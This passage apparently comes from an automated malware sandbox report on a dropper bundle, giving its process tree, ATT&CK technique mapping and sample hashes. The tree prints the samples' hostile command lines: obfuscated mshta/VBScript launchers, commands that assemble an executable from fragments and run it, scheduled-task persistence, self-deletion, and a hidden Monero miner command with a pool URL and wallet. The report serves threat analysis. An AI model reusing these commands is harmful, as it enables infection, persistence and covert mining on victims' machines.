    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2000bef28b4.exe
        
        Fri2000bef28b4.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1280
      - C:\Users\Admin\AppData\Local\Temp\is-4NL8D.tmp\Fri2000bef28b4.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-4NL8D.tmp\Fri2000bef28b4.tmp" /SL5="$101A2,1104945,831488,C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2000bef28b4.exe"
        6⤵
        Executes dropped EXE
        
        PID:2256
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri2060e5abb4.exe
      4⤵
      Loads dropped DLL
      PID:1416
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2060e5abb4.exe
        
        Fri2060e5abb4.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1836
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri20dd1f5f1511478e4.exe
      4⤵
      Loads dropped DLL
      PID:900
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20dd1f5f1511478e4.exe
        
        Fri20dd1f5f1511478e4.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1848
      - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
        6⤵
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\chrome.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
        7⤵
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
        
        "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
        7⤵
        
        PID:2128
        
        C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
        7⤵
        
        PID:1924
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Worldoffer.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        
        PID:4016
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Worldoffer.exe /f
        9⤵
        Kills process with taskkill
        
        PID:4044
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Delays execution with timeout.exe
        
        PID:3124
        
        C:\Users\Admin\AppData\Local\Temp\inst1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
        7⤵
        
        PID:2564
        
        C:\Users\Admin\AppData\Local\Temp\chrome update.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
        7⤵
        
        PID:2860
        
        C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
        
        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
        7⤵
        
        PID:2952
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        8⤵
        
        PID:1952
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
        9⤵
        
        PID:1760
        
        C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
        
        ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
        10⤵
        
        PID:2340
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )
        11⤵
        
        PID:3152
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
        12⤵
        
        PID:3336
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )
        11⤵
        
        PID:3660
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC
        12⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -f -iM "search_hyperfs_206.exe"
        10⤵
        Kills process with taskkill
        
        PID:2852
        
        C:\Users\Admin\AppData\Local\Temp\setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
        7⤵
        
        PID:2144
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
        8⤵
        
        PID:3616
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "setup.exe" /f
        9⤵
        Kills process with taskkill
        
        PID:3648
        
        C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
        7⤵
        
        PID:3140
        
        C:\Users\Admin\AppData\Local\Temp\liangzhang-game.exe
        
        "C:\Users\Admin\AppData\Local\Temp\liangzhang-game.exe"
        7⤵
        
        PID:3108
        
        C:\Users\Admin\AppData\Local\Temp\chrome1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
        7⤵
        
        PID:3268
        
        C:\Users\Admin\AppData\Local\Temp\chrome2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
        7⤵
        
        PID:3348
        
        C:\Users\Admin\AppData\Local\Temp\chrome3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
        7⤵
        
        PID:3396
        
        C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        7⤵
        
        PID:3536
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
        8⤵
        
        PID:3844
        
        C:\Windows\System32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:3964
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
        10⤵
        Creates scheduled task(s)
        
        PID:3988
        
        C:\Windows\System32\cmd.exe
        
        "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
        9⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        
        C:\Users\Admin\AppData\Roaming\services64.exe
        10⤵
        
        PID:2160
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
        11⤵
        
        PID:2468
        
        C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        12⤵
        
        PID:3576
        
        C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "/sihost64"
        13⤵
        
        PID:1588
        
        C:\Windows\explorer.exe
        
        C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth
        12⤵
        
        PID:980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri209e1eb19c.exe /mixtwo
      4⤵
      PID:928
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri209e1eb19c.exe
        
        Fri209e1eb19c.exe /mixtwo
        5⤵
        
        PID:2164
      - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri209e1eb19c.exe
        
        Fri209e1eb19c.exe /mixtwo
        6⤵
        Executes dropped EXE
        
        PID:2292
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im "Fri209e1eb19c.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri209e1eb19c.exe" & exit
        7⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im "Fri209e1eb19c.exe" /f
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2484
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri2058e26838.exe
      4⤵
      Loads dropped DLL
      PID:1692
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2058e26838.exe
        
        Fri2058e26838.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:1984
      - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2058e26838.exe
        
        "C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2058e26838.exe"
        6⤵
        Executes dropped EXE
        Modifies data under HKEY_USERS
        
        PID:2884
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri20be0777551040f32.exe
      4⤵
      Loads dropped DLL
      PID:1616
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20be0777551040f32.exe
        
        Fri20be0777551040f32.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:636
      - C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscriPT: closE ( CReAteoBjEcT("wScRIpT.ShEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /c coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20be0777551040f32.exe"" dSaU40W5.ExE && sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF """" == """" for %s IN (""C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20be0777551040f32.exe"" ) do taskkill -IM ""%~nXs"" /F " , 0 ,trUe ) )
        6⤵
        
        PID:2372
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /c coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20be0777551040f32.exe" dSaU40W5.ExE&&sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF "" == "" for %s IN ("C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20be0777551040f32.exe" ) do taskkill -IM "%~nXs" /F
        7⤵
        
        PID:2800
        
        C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE
        
        DsaU40W5.exE /pvkJlKE4Jas7gQ
        8⤵
        Executes dropped EXE
        
        PID:2864
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" VBscriPT: closE ( CReAteoBjEcT("wScRIpT.ShEll" ). RUn ( "C:\Windows\system32\cmd.exe /q /c coPY /Y ""C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE"" dSaU40W5.ExE && sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF ""/pvkJlKE4Jas7gQ "" == """" for %s IN (""C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE"" ) do taskkill -IM ""%~nXs"" /F " , 0 ,trUe ) )
        9⤵
        Modifies Internet Explorer settings
        
        PID:2932
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /q /c coPY /Y "C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE" dSaU40W5.ExE&&sTarT DsaU40W5.exE /pvkJlKE4Jas7gQ & iF "/pvkJlKE4Jas7gQ " == "" for %s IN ("C:\Users\Admin\AppData\Local\Temp\dSaU40W5.ExE" ) do taskkill -IM "%~nXs" /F
        10⤵
        
        PID:2248
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\System32\mshta.exe" vbSCrIpt: cLOSe (cREatEOBJecT( "WscripT.SHeLL"). Run ("cMd.eXe /Q /C echo | seT /P = ""MZ"" > VjcFAPpO.Q4 & copY /y /b VJcFAppO.Q4 + YQIFB2E1.V0E + oEMR_.C~2 +AgL~7F.X+mfEBT.JK + S9TpcxeR.11P FCBUT_S.vQ & STarT odbcconf.exe /A { Regsvr .\FcbUT_S.VQ } ", 0 ,TruE ) )
        9⤵
        
        PID:844
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /Q /C echo | seT /P = "MZ" > VjcFAPpO.Q4& copY /y /b VJcFAppO.Q4+ YQIFB2E1.V0E+oEMR_.C~2 +AgL~7F.X+mfEBT.JK +S9TpcxeR.11P FCBUT_S.vQ& STarT odbcconf.exe /A {Regsvr .\FcbUT_S.VQ }
        10⤵
        
        PID:1656
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo "
        11⤵
        
        PID:2276
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>VjcFAPpO.Q4"
        11⤵
        
        PID:828
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill -IM "Fri20be0777551040f32.exe" /F
        8⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2876
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri204accdcd745.exe
      4⤵
      Loads dropped DLL
      PID:1652
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri204accdcd745.exe
        
        Fri204accdcd745.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1580
      - C:\Users\Admin\Pictures\Adobe Films\kdWUQqdpuQPF6D8o6IwoAzTq.exe
        
        "C:\Users\Admin\Pictures\Adobe Films\kdWUQqdpuQPF6D8o6IwoAzTq.exe"
        6⤵
        
        PID:976
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 1524
        6⤵
        Program crash
        
        PID:3028
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri208f6a10911.exe
      4⤵
      Loads dropped DLL
      PID:1688
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri208f6a10911.exe
        
        Fri208f6a10911.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:1060
      - C:\Users\Admin\AppData\Local\Temp\is-7LKAH.tmp\Fri208f6a10911.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-7LKAH.tmp\Fri208f6a10911.tmp" /SL5="$1018A,140047,56320,C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri208f6a10911.exe"
        6⤵
        Executes dropped EXE
        
        PID:1644
        
        C:\Users\Admin\AppData\Local\Temp\is-L4F6A.tmp\PowerOff.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-L4F6A.tmp\PowerOff.exe" /S /UID=91
        7⤵
        Executes dropped EXE
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\f0-25a0a-285-a0692-a05b46bbfb250\Tucaepivole.exe
        
        "C:\Users\Admin\AppData\Local\Temp\f0-25a0a-285-a0692-a05b46bbfb250\Tucaepivole.exe"
        8⤵
        
        PID:1692
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
        9⤵
        
        PID:2684
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
        9⤵
        
        PID:3300
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851483
        9⤵
        
        PID:3840
        
        C:\Program Files\Internet Explorer\iexplore.exe
        
        "C:\Program Files\Internet Explorer\iexplore.exe" http://vexacion.com/afu.php?zoneid=1851513
        9⤵
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\ab-4de77-3d8-bd987-f685180569ac5\Qeqosodewo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ab-4de77-3d8-bd987-f685180569ac5\Qeqosodewo.exe"
        8⤵
        
        PID:1584
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start https://iplogger.org/1rpHg7
        8⤵
        
        PID:2468
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Fri207a27f7f543e5fe.exe
      4⤵
      Loads dropped DLL
      PID:1116
    - - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri207a27f7f543e5fe.exe
        
        Fri207a27f7f543e5fe.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        
        PID:984
      - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri207a27f7f543e5fe.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri207a27f7f543e5fe.exe
        6⤵
        Executes dropped EXE
        
        PID:2740
      - C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri207a27f7f543e5fe.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri207a27f7f543e5fe.exe
        6⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2980

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20211126204823.log C:\Windows\Logs\CBS\CbsPersist_20211126204823.cab
1⤵
- Drops file in Windows directory
PID:2804

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "712031356334783312337920446374774967-12525216617708491921902946180-1195529410"
1⤵
PID:2248

C:\Users\Admin\AppData\Local\Temp\925.exe
C:\Users\Admin\AppData\Local\Temp\925.exe
1⤵
PID:3244
- C:\Users\Admin\AppData\Local\Temp\925.exe
  C:\Users\Admin\AppData\Local\Temp\925.exe
  2⤵
  PID:3504
- - C:\Windows\SysWOW64\icacls.exe
    icacls "C:\Users\Admin\AppData\Local\3513e9c2-2f31-4b33-bd75-f4a4d2f2c83d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    3⤵
    - Modifies file permissions
    PID:2212
- - C:\Users\Admin\AppData\Local\Temp\925.exe
    "C:\Users\Admin\AppData\Local\Temp\925.exe" --Admin IsNotAutoStart IsNotTask
    3⤵
    PID:4036
  - - C:\Users\Admin\AppData\Local\Temp\925.exe
      "C:\Users\Admin\AppData\Local\Temp\925.exe" --Admin IsNotAutoStart IsNotTask
      4⤵
      PID:3456
    - - C:\Users\Admin\AppData\Local\334482d4-3e7e-4625-8ec6-6cd3165afd0c\build2.exe
        
        "C:\Users\Admin\AppData\Local\334482d4-3e7e-4625-8ec6-6cd3165afd0c\build2.exe"
        5⤵
        
        PID:3604
      - C:\Users\Admin\AppData\Local\334482d4-3e7e-4625-8ec6-6cd3165afd0c\build2.exe
        
        "C:\Users\Admin\AppData\Local\334482d4-3e7e-4625-8ec6-6cd3165afd0c\build2.exe"
        6⤵
        
        PID:3792
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\334482d4-3e7e-4625-8ec6-6cd3165afd0c\build2.exe" & del C:\ProgramData\*.dll & exit
        7⤵
        
        PID:4084
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im build2.exe /f
        8⤵
        Kills process with taskkill
        
        PID:2304
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        8⤵
        Delays execution with timeout.exe
        
        PID:3808

C:\Users\Admin\AppData\Local\Temp\711C.exe
C:\Users\Admin\AppData\Local\Temp\711C.exe
1⤵
PID:1712
- C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
  "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
  2⤵
  PID:3496

C:\Users\Admin\AppData\Local\Temp\F72D.exe
C:\Users\Admin\AppData\Local\Temp\F72D.exe
1⤵
PID:3232

C:\Windows\system32\taskeng.exe
taskeng.exe {F50843DC-C71E-4471-9A2A-9CB66702DFF3} S-1-5-21-103686315-404690609-2047157615-1000:EDWYFHKN\Admin:Interactive:[1]
1⤵
PID:4036
- C:\Users\Admin\AppData\Roaming\vuejucc
  C:\Users\Admin\AppData\Roaming\vuejucc
  2⤵
  PID:3324
- C:\Users\Admin\AppData\Local\3513e9c2-2f31-4b33-bd75-f4a4d2f2c83d\925.exe
  C:\Users\Admin\AppData\Local\3513e9c2-2f31-4b33-bd75-f4a4d2f2c83d\925.exe --Task
  2⤵
  PID:4044

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Install Root Certificate

T1130

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2000bef28b4.exe

MD5
b84f79adfccd86a27b99918413bb54ba

SHA1
06a61ab105da65f78aacdd996801c92d5340b6ca

SHA256
6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49

SHA512
99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2000bef28b4.exe

MD5
b84f79adfccd86a27b99918413bb54ba

SHA1
06a61ab105da65f78aacdd996801c92d5340b6ca

SHA256
6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49

SHA512
99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2002bea00b158d.exe

MD5
c7cd0def6982f7b281c6a61d29eec4be

SHA1
f9f600d70d60cf79563e84cec0b883fa3f541690

SHA256
b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9

SHA512
370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2002bea00b158d.exe

MD5
c7cd0def6982f7b281c6a61d29eec4be

SHA1
f9f600d70d60cf79563e84cec0b883fa3f541690

SHA256
b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9

SHA512
370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20070cd68c3181d0.exe

MD5
8a132916d1a576fb6cf97fc99015d47e

SHA1
886bde4951275c9d715eb8d04f748cd88fd36c20

SHA256
ac3d28af6fc13a34a4414a76c8f181e5cc9e28262b881ff290516fa1d4231890

SHA512
1ec5fa75d72d8af0a02de7d964561239caa752f5d3ede311058aa8dc32b97a294041fa69f23fe212da05268e4e983aa959567c3cde43c5af6d6d70dcb658374a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20070cd68c3181d0.exe

MD5
8a132916d1a576fb6cf97fc99015d47e

SHA1
886bde4951275c9d715eb8d04f748cd88fd36c20

SHA256
ac3d28af6fc13a34a4414a76c8f181e5cc9e28262b881ff290516fa1d4231890

SHA512
1ec5fa75d72d8af0a02de7d964561239caa752f5d3ede311058aa8dc32b97a294041fa69f23fe212da05268e4e983aa959567c3cde43c5af6d6d70dcb658374a

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri20405c77f8562ea6.exe

MD5
fc7df1befbefd1f0349e7a86f6f76b4d

SHA1
703f3d4d5171096ae391944fa1ed83217bd4caac

SHA256
66371bc1e9aecb2907273c1c3d07b8e63c3b4b595f71f41c4b7dd52c75bdc6a9

SHA512
adb1f5b9c5ca01514af525769d2afc27a86fb3dc1597c8929369e97835e4c6cc2f320401ce9d42b35fb0f2a8a413fd08b86d582e92665e0b6e09b3a058f30064

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2050c5d6de57ca396.exe

MD5
99471e8043cb5f141962e1cfe12d44f4

SHA1
57c6baf415f892dfa82c206c1380a34130dad19d

SHA256
1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509

SHA512
a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2050c5d6de57ca396.exe

MD5
99471e8043cb5f141962e1cfe12d44f4

SHA1
57c6baf415f892dfa82c206c1380a34130dad19d

SHA256
1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509

SHA512
a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2050c5d6de57ca396.exe

MD5
99471e8043cb5f141962e1cfe12d44f4

SHA1
57c6baf415f892dfa82c206c1380a34130dad19d

SHA256
1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509

SHA512
a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS87682406\Fri2058e26838.exe

MD5
7b680205a93a4986f4e6378428939d95

SHA1
42e0eee66bce8edda035adf691cb27e883b97655

SHA256
